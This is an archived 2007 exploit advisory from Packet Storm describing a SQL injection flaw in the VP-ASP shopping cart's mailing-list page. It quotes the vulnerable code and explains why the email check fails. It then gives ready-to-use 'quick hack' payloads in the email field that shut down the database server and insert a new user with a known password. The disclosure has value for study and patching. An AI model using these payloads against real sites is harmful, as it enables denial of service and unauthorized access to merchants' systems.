exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

VP-ASP-SQL.txt

VP-ASP-SQL.txt
Posted May 3, 2007
Authored by tracewar

VP-ASP suffers from a SQL injection vulnerability. Details provided.

tags | exploit, sql injection, asp
SHA-256 | 688110bd3b6796180b031f9d3cd1dc83a93d1a47dc937364764b82c320563468

VP-ASP-SQL.txt

Change Mirror Download

************************************************** !!! WARNING !!! ***********************************************************
* FOR EDUCATIONAL PURPOSES ONLY! *
******************************************************************************************************************************
* Neither myself nor any of my Affiliates shall be liable for any direct, incidental, consequential, indirect *
* or punitive damages arising out of access to, inability to access, or any use of the content of this advisory, *
* including without limitation any PC, other equipment or other property, even if I am Expressly advised of *
* the possibility of such damages. I DO NOT encourage criminal activities. If you use this advisory or commit *
* criminal acts with it, then you are solely responsible for your own actions and by use, downloading,transferring, *
* and/or reading anything from this advisory you are considered to have accepted the terms and conditions and have read *
* this disclaimer. Once again this advisory is for educational purposes only. *
******************************************************************************************************************************

* PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE *

VP-ASP x.x.x shopmaillist.asp SQL Injection (TESTED ON 5.xx/6.00>?) discovered by tracewar(tracewar@gmail.com).

the SQL injection exists in the UpdateCustomer procedure:

Sub UpdateCustomer
if getconfig("xMYSQL")="Yes" then
MYSQLMaillistUpdateCustomer
exit sub
end if
dim dbc, whereok
dim doupdate, templastname
OpenCustomerDb dbc
Set objRS = Server.CreateObject("ADODB.Recordset")
templastname=replace(strlastname,"'","''")
SQL = "SELECT * FROM " & dbtable & " WHERE "
whereok=""
sql=sql & whereok & " LastName='" & TempLastName & "'"
whereok = " AND "
SQL = SQL & whereok & " email='" & stremail & "'"
objRS.open SQL, dbc, adOpenKeyset, adLockOptimistic, adcmdText
'debugwrite sql
if not ObjRS.eof then
DoUpdate="True"
else
objRs.close
set objRS=nothing
end if
If Doupdate="" then
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.open dbtable, dbc, adOpenKeyset, adLockOptimistic, adCmdTable
objRS.AddNew
end if
Updateminimuminfo objrs
CloseRecordset objRS
ShopCloseDatabase dbc
end sub

If you keep tracking the code you will notice the "stremail" query isn't checked properly for SQL injections:

Else
ValidateData()
if sError = "" Then
If unsubscribe="" then
UpdateCustomer
SendMailToMerchant LangMailListRegistration
WriteInfo

the ValidateData() procedure is totally useless:

Sub ValidateData
strFirstname = Request.Form("strFirstname")
strLastname = Request.Form("strLastname")
strEmail = Request.Form("strEmail")
unsubscribe=request("blnmaillist")
ValidateMininumInfo
End Sub


Sub ValidateMininumInfo
BlnMailList=TRUE
If strLastname = "" Then
sError = sError & LangCustLastname & LangCustRequired & "<br>"
End If
If strEmail = "" Then
sError = sError & LangCustEmail & LangCustRequired & "<br>"
Else
CustomerValidateEmail stremail
end If
end sub

Sub CustomerValidateEmail (stremail)
If Not InStr(strEmail, "@") > 1 Then
Serror=Serror & LangInvalidEmail & "<br>"
end if
End sub

the query must contain @ as a first character in order to pass the CustomerValidateEmail useless procedure.
oh and this is also the reason why sql injection scanners didn't detect this injection earlier(HMPF HMPF *TIP* :P)

quick hack:

write this as email: JUNK@';shutdown--
in order to shutdown the sql server.

write this as email: asdsadd@asdd.com';insert into tbluser ('fldusername','fldpassword','fldaccess') values ('a','a')--
in order to add user 'a' with password 'a'.

THE END.

* PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE *
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close